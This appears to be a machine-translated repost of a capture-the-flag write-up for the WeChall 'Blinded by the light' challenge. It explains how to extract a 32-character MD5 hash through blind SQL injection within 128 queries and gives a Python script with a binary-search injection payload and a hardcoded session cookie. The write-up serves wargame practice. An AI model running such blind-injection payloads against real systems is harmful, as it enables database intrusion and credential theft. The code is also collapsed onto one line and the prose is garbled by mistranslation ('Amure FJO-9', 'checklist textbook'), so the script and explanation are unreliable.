Writeup Blinded by the light 01/16 Update SLTechnology News&Howtos

Writeup Blinded by the light

2025-01-16 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)06/01 Report--

Topic Tip:

1. Your mission is to extract an md5 password hash out of a database.

You need to get the password information in the database, and the password is encrypted by MD5.

2. Your limit for this blind sql injection are 128 queries.

You can inject up to 128 times, and by looking at the source code, you can see that the password will be regenerated if it is exceeded.

3. You can view some of the key source code

$query = "SELECT 1 FROM (SELECT password FROM blight WHERE sessid=$sessid) b WHERE password='$password'"

You can see that there are injection vulnerabilities through the source code, but you can only make a yes or no judgment.

$hash = GWF_Random::randomKey (32, 'ABCDEF0123456789')

The password is a randomly generated 32-bit string with uppercase Amure FJO-9.

Solve the problem:

Each bit of the 32-bit password is judged by the binary tree method, and the value of one bit can be obtained four times. The password can be obtained after exactly 128 injections. The Python script is as follows:

#-*-coding: utf-8-*-import urllib2import urllibimport cookielibimport stringimport reimport Cookieml= ['0,1,' 2,'3,'4,'5,'6,'7,'8,'9, A, B, C, D, E, F]; # set a cookie processor cj = cookielib.CookieJar () Opener = urllib2.build_opener (urllib2.HTTPCookieProcessor (cj)); urllib2.install_opener (opener); for lindex in range (32): xj= 0; xvalue= 16; for sindex in range (4): if xj > 0: xvalue= xvalue + 16 / (2 * * (sindex + 1)); else: xvalue= xvalue-16 / (2 * (sindex + 1)) # second time do url request, the cookiejar will auto handle the cookie loginBaiduUrl = "http://www.wechall.net/challenge/blind_light/index.php"; strinject ='1\'or ascii (substr (password,%d,1)) >% d #'% (lindex+1,ord (ml [x value-1])); # print strinject Para = {'injection': strinject,' inject': 'Inject',}; postData = urllib.urlencode (para); req = urllib2.Request (loginBaiduUrl, postData); req.add_header (' User-Agent', 'Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0') Req.add_header ('Content-Type',' application/x-www-form-urlencoded'); req.add_header ('Cookie',' WC=8624571-16186 murh 8NKQBMCengtEsn4'); req.add_header ('Referer',' http://www.wechall.net/challenge/blind_light/index.php'); req.add_header ('Connection',' close'); resp = urllib2.urlopen (req) RespInfo = resp.info (); # catch the string content = resp.read () check_text= re.findall ('(attempt [s\.\!] {1pt2})', content,re.S) [0] # print check_text if checklist textbook required to be counted through regular matching: xj=0; else: xj=1 If xj==0: print ml [xvalue-1]; else: print ml [xvalue]

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.